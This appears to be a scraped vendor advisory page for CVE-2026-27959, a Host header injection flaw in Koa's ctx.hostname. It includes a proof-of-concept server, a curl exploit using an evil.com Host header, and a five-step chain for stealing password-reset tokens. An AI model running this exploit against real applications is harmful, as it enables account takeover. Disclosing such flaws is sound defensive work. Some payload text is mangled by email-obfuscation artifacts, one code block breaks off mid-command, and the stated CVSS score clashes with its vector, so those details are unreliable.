🛡️ CVE-2026-27959 — koa
Description
Koa has Host Header Injection via ctx.hostname
Summary
Koa's ctx.hostname API performs naive parsing of the HTTP Host header, extracting everything before the first colon without validating the input conforms to RFC 3986 hostname syntax. When a malformed Host header containing a @ symbol (e.g., evil.com:[email protected]) is received, ctx.hostname returns evil.com - an attacker-controlled value. Applications using ctx.hostname for URL generation, password reset links, email verification URLs, or routing decisions are vulnerable to Host header injection attacks.
Details
The vulnerability exists in Koa's hostname getter in lib/request.js:
```javascript
// Koa 2.16.1 - lib/request.js
get hostname() {
const host = this.host;
if (!host) return '';
if ('[' === host[0]) return this.URL.hostname || ''; // IPv6 literal
return host.split(':', 1)[0];
}
```
The host getter retrieves the raw header value with HTTP/2 and proxy support:
```javascript
// Koa 2.16.1 - lib/request.js
get host() {
const proxy = this.app.proxy;
let host = proxy && this.get('X-Forwarded-Host');
if (!host) {
if (this.req.httpVersionMajor >= 2) host = this.get(':authority');
if (!host) host = this.get('Host');
}
if (!host) return '';
return host.split(',')[0].trim();
}
```
The Problem
The parsing logic simply splits on the first : and returns the first segment. There is no validation that the resulting string is a valid hostname per RFC 3986 Section 3.2.2.
RFC 3986 Section 3.2.2 defines the host component as:
```
host = IP-literal / IPv4address / reg-name
reg-name = *( unreserved / pct-encoded / sub-delims )
unreserved = ALPHA / DIGIT / "-" / "." / "_" / "~"
sub-delims = "!" / "$" / "&" / "'" / "(" / ")" / "*" / "+" / "," / ";" / "="
```
The @ character is explicitly NOT permitted in the host component - it is the delimiter separating userinfo from host in the authority component.
Attack Vector
When an attacker sends:
```
Host: evil.com:[email protected]:3000
```
Koa parses this as:
| API | Returns | Notes |
|-----|---------|-------|
| ctx.get('Host') | "evil.com:[email protected]:3000" | Raw header |
| ctx.hostname | "evil.com" | Attacker-controlled |
| ctx.host | "evil.com:[email protected]:3000" | Raw header value |
| ctx.origin | "http://evil.com:[email protected]:3000" | Protocol + malformed host |
The ctx.hostname API returns evil.com because the parser splits on the first : without understanding that evil.com:[email protected] is a malformed authority component where evil.com:fake would be interpreted as userinfo by a proper URI parser.
Additional Concern: ctx.origin
Koa's ctx.origin property concatenates protocol and host without validation:
```javascript
// lib/request.js
get origin() {
return ${this.protocol}://${this.host};
}
```
Applications using ctx.origin for URL generation receive the full malformed Host header value, creating URLs with embedded credentials that browsers may interpret as userinfo.
HTTP/2 Consideration
Koa explicitly checks httpVersionMajor >= 2 to read the :authority pseudo-header:
```javascript
if (this.req.httpVersionMajor >= 2) host = this.get(':authority');
```
The same vulnerability applies - malformed :authority values containing userinfo would be accepted and parsed identically.
PoC
Setup
```javascript
// server.js
const Koa = require('koa');
const app = new Koa();
// Simulates password reset URL generation (common vulnerable pattern)
app.use(async ctx => {
if (ctx.path === '/forgot-password') {
const resetToken = 'abc123securtoken';
const resetUrl = ${ctx.protocol}://${ctx.hostname}/reset?token=${resetToken};
ctx.body = {
message: 'Password reset link generated',
resetUrl: resetUrl,
debug: {
rawHost: ctx.get('Host'),
parsedHostname: ctx.hostname,
origin: ctx.origin,
protocol: ctx.protocol
}
};
}
});
app.listen(3000, () => console.log('Server on http://localhost:3000'));
```
Exploit
```bash
curl -H "Host: evil.com:fake@localhost:3000" http://localhost:3000/forgot-password
```
Result
```json
{
"message": "Password reset link generated",
"resetUrl": "http://evil.com/reset?token=abc123securtoken",
"debug": {
"rawHost": "evil.com:fake@localhost:3000",
"parsedHostname": "evil.com",
"origin": "http://evil.com:fake@localhost:3000",
"protocol": "http"
}
}
```
The password reset URL points to evil.com instead of the legitimate server. In a real attack:
1. Attacker requests password reset for victim's email with malicious Host header
2. Server generates reset link using ctx.hostname → https://evil.com/reset?token=SECRET
3. Victim receives email with poisoned link
4. Victim clicks link, token is sent to attacker's server
5. Attacker uses token to reset victim's password
Additional Test Cases
```bash
# Basic injection
cu
How this vulnerability can be exploited
This issue can be reached over the network, attack complexity is low, an attacker needs no privileges on the target. No user interaction is required. The scope is unchanged, so the impact stays within the vulnerable component. Rated impact: confidentiality none, integrity high, availability none.
Weakness class
CVE-2026-27959 is classified as CWE-20: Improper Input Validation. The application accepts input without checking that it has the expected form, so malformed values reach code that assumes they are well formed.
Affected software
CVE-2026-27959 is recorded against 1 package.
- koa
Timeline and source
Published on 26 February 2026 and last revised on 15 July 2026. A public exploit is known to exist, which raises the urgency of patching considerably. A vendor advisory or fix has been published. Record sourced from OSV.
References
github.com (Web)
nvd.nist.gov (Advisory)
github.com (Web)
github.com (Web)
github.com (Package)
CVE-2026-27959 on other distributions
Each distribution ships its own build and its own fixed version. Pick the one you run:
Details
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Affected Packages
| Software | From version | Fixed in |
|---|---|---|
| koa | — | — |
References
Similar Threats
- Unknown CLSA-2026-1774830253
- High ROOT-APP-NPM-CVE-2025-25200
- Medium ROOT-APP-NPM-CVE-2025-32379
- Medium ROOT-APP-NPM-CVE-2025-8129
- High ROOT-APP-NPM-CVE-2026-27959
More CVE 2026 advisories
Browse all of CVE 2026 in the advisory index.
Exploit Protection
Are you running koa?
CVE-2026-27959 carries CVSS 8.0 High rating and a public exploit already exists. BotEraser checks your installation against this and other known CVE records, and blocks IPs associated with exploit activity.
Check My Site For CVE-2026-27959 →No credit card required · Results in minutes
ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.